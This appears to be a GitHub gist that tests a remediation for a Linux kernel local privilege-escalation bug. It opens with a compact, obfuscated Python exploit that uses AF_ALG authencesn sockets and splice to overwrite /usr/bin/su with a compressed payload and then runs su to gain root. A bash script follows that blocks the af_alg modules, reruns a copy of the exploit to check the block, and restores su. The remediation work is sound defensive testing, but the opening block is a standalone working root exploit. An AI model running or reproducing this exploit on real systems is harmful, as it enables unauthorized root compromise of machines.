@MatMercer
Created April 30, 2026 12:20
copy fail exploit remediation
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
#!/usr/bin/env bash
set -u -o pipefail   # unset variables are fatal; a pipeline fails if any stage fails (no -e: each step checks its own status)
# ANSI colour escapes; kept as literal backslash sequences and expanded by `echo -e` in the helpers.
BOLD='\033[1m'
RED='\033[0;31m'
GRN='\033[0;32m'
YLW='\033[0;33m'
RST='\033[0m'
# Print a green "[ OK ]" status line built from all arguments.
ok() {
  local msg="$*"
  echo -e "${GRN}[ OK ] ${msg}${RST}"
}
# Print a red "[ !! ]" status line and bump the global FAILS tally read by the summary.
fail() {
  local msg="$*"
  echo -e "${RED}[ !! ] ${msg}${RST}"
  FAILS=$((FAILS + 1))
}
# Print a yellow "[ ** ]" informational line built from all arguments.
inf() {
  local msg="$*"
  echo -e "${YLW}[ ** ] ${msg}${RST}"
}
# Print a bold "=== title ===" section header preceded by a blank line.
hdr() {
  local title="$*"
  printf '\n'
  echo -e "${BOLD}=== ${title} ===${RST}"
}
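FAILS=0                                          # incremented by fail()
MODPROBE_CONF=/etc/modprobe.d/block-af_alg.conf
# Scratch file for the test payload. mktemp creates it atomically, mode 0600,
# with an unpredictable name — the previous /tmp/.af_alg_test_$$.py was
# guessable (PID-based) and could be pre-created by another local user.
EXPLOIT_TMP=$(mktemp /tmp/.af_alg_test_XXXXXX) || { echo "mktemp failed" >&2; exit 1; }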
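# Always restore su from package on exit — keeps system clean regardless of result.
# A failed restore is reported loudly (the old `|| true` swallowed it): that case
# would leave a possibly-modified su in place, which is the worst outcome here.
cleanup() {
  rm -f "$EXPLOIT_TMP"
  inf "Restoring su from package (post-test cleanup)..."
  if sudo apt-get install --reinstall -y util-linux -qq; then
    ok "su restored"
  else
    fail "apt-get reinstall of util-linux FAILED — /usr/bin/su may still be modified; restore it manually"
  fi
  # Cross-check the restored binary against the step-1 baseline. SU_MD5_BEFORE is
  # unset if the script died before step 1, hence the :- default under set -u.
  if [[ -n "${SU_MD5_BEFORE:-}" && -r /usr/bin/su ]]; then
    local md5_now
    md5_now=$(md5sum /usr/bin/su | awk '{print $1}')
    if [[ "$md5_now" == "$SU_MD5_BEFORE" ]]; then
      ok "su MD5 matches baseline"
    else
      fail "su MD5 ($md5_now) differs from baseline ($SU_MD5_BEFORE) after restore"
    fi
  fi
}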
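trap cleanup EXIT
# ── 1. Clean baseline ─────────────────────────────────────────────────────────
hdr "1. Establish clean baseline"
inf "Reinstalling util-linux to guarantee known-good su..."
# The baseline hash is only trustworthy if this reinstall actually succeeded;
# otherwise we may be hashing an already-tampered binary and later compare
# "modified" against "modified".
if ! sudo apt-get install --reinstall -y util-linux -qq; then
  fail "Could not reinstall util-linux — baseline su is NOT guaranteed clean"
fi
# md5 is adequate here: it only detects whether the file changes during this
# run, it is not defending against an attacker-chosen collision.
SU_MD5_BEFORE=$(md5sum /usr/bin/su | awk '{print $1}')
if [[ -z "$SU_MD5_BEFORE" ]]; then
  fail "Could not hash /usr/bin/su — aborting"
  exit 1   # EXIT trap still runs cleanup
fi
ok "su MD5 baseline : $SU_MD5_BEFORE"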
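# ── 2. Apply remediation ──────────────────────────────────────────────────────
hdr "2. Apply remediation"
inf "Writing modprobe block for af_alg and algif_aead..."
# 'install <mod> /bin/false' rather than 'blacklist': blacklist only ignores the
# module's internal aliases, so an explicit 'modprobe af_alg' or loading it as a
# dependency of another algif_* module would still succeed; an install line makes
# every load attempt run /bin/false instead. Strictly only the af_alg line is
# needed (all algif_* modules depend on it); algif_aead is belt and braces.
echo "install af_alg /bin/false" | sudo tee "$MODPROBE_CONF" > /dev/null
echo "install algif_aead /bin/false" | sudo tee -a "$MODPROBE_CONF" > /dev/null
ok "Created $MODPROBE_CONF"
# modprobe config cannot affect a module that is already loaded or built into
# the kernel. The former is handled by rmmod below; the latter is reported here
# so a failing socket test in step 3 is not a surprise.
KREL=$(uname -r)
if grep -q '/af_alg\.ko' "/lib/modules/$KREL/modules.builtin" 2>/dev/null; then
  fail "af_alg is built into kernel $KREL — a modprobe block cannot disable it; only a kernel update helps"
fi
# af_alg cannot be unloaded while any algif_* module holds a reference on it, so
# every loaded algif_* goes first — not just algif_aead; a loaded algif_hash/
# algif_skcipher/algif_rng makes the af_alg rmmod fail just the same.
# /proc/modules lists exactly the loaded loadable modules, which lets us tell
# "not loaded" apart from "rmmod failed" instead of reporting both as "was not loaded".
inf "Unloading loaded algif_* modules, then af_alg..."
for mod in algif_aead algif_hash algif_skcipher algif_rng af_alg; do
  if grep -q "^$mod " /proc/modules; then
    if sudo rmmod "$mod" 2>/dev/null; then
      ok "$mod unloaded"
    else
      fail "$mod is loaded but could not be unloaded (open AF_ALG sockets or a dependent module?) — block is not effective until it is"
    fi
  else
    ok "$mod was not loaded"
  fi
done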
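# ── 3. Verify block is active ─────────────────────────────────────────────────
hdr "3. Verify af_alg is blocked"
# The authoritative check, independent of what modprobe/rmmod reported: can an
# unprivileged process still create an AF_ALG (38) SOCK_SEQPACKET (5) socket?
# Only OSError counts as "blocked"; any other exception is printed verbatim and
# lands in the failure branch, so a broken test cannot look like a working fix.
SOCKET_TEST=$(python3 -c "
import socket
try:
    s = socket.socket(38, 5, 0)
except OSError as e:
    print(f'BLOCKED: {e}')
else:
    s.close()
    print('OPEN')
" 2>&1)
if echo "$SOCKET_TEST" | grep -q '^BLOCKED'; then
  ok "AF_ALG socket: $SOCKET_TEST"
else
  fail "AF_ALG socket still opens — modprobe block did not take effect"
  fail "Result: $SOCKET_TEST"
  inf "Likely causes: af_alg still loaded (see rmmod results above, /proc/modules) or built into the kernel (/lib/modules/$(uname -r)/modules.builtin)"
fi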
# ── 4. Run exploit (write attempt only, no shell spawn) ───────────────────────
# Deliberately run as the invoking user without sudo: the question being tested
# is whether an unprivileged process can still reach the write path.
hdr "4. Run exploit as $(whoami) — no sudo, no shell spawn"
cat > "$EXPLOIT_TMP" << 'PYEOF'
#!/usr/bin/env python3
import os as g, zlib, socket as s, sys
def d(x): return bytes.fromhex(x)
def c(f, t, payload):
try:
a = s.socket(38, 5, 0)
except OSError as e:
print(f"AF_ALG socket blocked: {e}")
sys.exit(2) # exit 2 = socket was blocked
a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"))
h=279; v=a.setsockopt
v(h,1,d('0800010000000010'+'0'*64))
v(h,5,None,4)
u,_=a.accept(); o=t+4; i=d('00')
u.sendmsg([b"A"*4+payload],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3)],32768)
r,w=g.pipe(); n=g.splice
n(f,w,o,offset_src=0); n(r,u.fileno(),o)
try: u.recv(8+t)
except: pass
f=g.open("/usr/bin/su",0); i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4]); i+=4
# Write loop completed without being blocked — file may have been modified
print("Write loop completed — remediation did NOT block the write")
sys.exit(1) # exit 1 = write completed (bad)
PYEOF
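# Capture stdout+stderr so a Python traceback can be told apart from the
# payload's own exit(1) after its write loop: both map to exit status 1, and
# the old logic read either one as "write ran, kernel rejected it".
EXPLOIT_OUT=$(python3 "$EXPLOIT_TMP" 2>&1); EXPLOIT_EXIT=$?
printf '%s\n' "$EXPLOIT_OUT"
# ── 5. Evaluate result ────────────────────────────────────────────────────────
hdr "5. Result"
SU_MD5_AFTER=$(md5sum /usr/bin/su | awk '{print $1}')
echo " su MD5 before : $SU_MD5_BEFORE"
echo " su MD5 after : $SU_MD5_AFTER"
echo " exploit exit : $EXPLOIT_EXIT (2=socket blocked, 1=write loop completed or payload crashed, other=unexpected)"
if [[ $EXPLOIT_EXIT -eq 2 ]]; then
  ok "AF_ALG socket was blocked — exploit could not start"
  ok "Remediation EFFECTIVE"
elif [[ "$SU_MD5_BEFORE" != "$SU_MD5_AFTER" ]]; then
  # Checked before the exit code: a modified binary is a failure however the payload exited.
  fail "su binary was MODIFIED — exploit succeeded despite remediation"
  fail "Remediation FAILED — consider kernel update: sudo apt-get dist-upgrade"
elif [[ $EXPLOIT_EXIT -eq 1 && "$EXPLOIT_OUT" != *Traceback* ]]; then
  # Write loop ran to completion but file unchanged — kernel rejected the write
  ok "Write loop ran but su is UNCHANGED — exploit had no effect"
  ok "Remediation EFFECTIVE (kernel rejected the write)"
else
  # Payload aborted before finishing its loop (traceback, or a status it never
  # uses): nothing was proven either way, so do not claim success.
  fail "Exploit aborted before completing its write loop (exit $EXPLOIT_EXIT) — result INCONCLUSIVE, see output above"
fi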
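# ── 6. Summary ────────────────────────────────────────────────────────────────
hdr "Summary"
echo " af_alg block : $MODPROBE_CONF (permanent — survives reboot)"
echo " su binary : will be restored from package by cleanup trap"
echo ""
inf "The module block is a mitigation only; a patched kernel is the actual fix"
# Exit non-zero when any check failed so the script can gate automation
# (CI, config management); the EXIT trap still runs cleanup before termination.
if [[ $FAILS -eq 0 ]]; then
  ok "All checks passed."
  exit 0
fi
fail "$FAILS check(s) failed — review output above."
exit 1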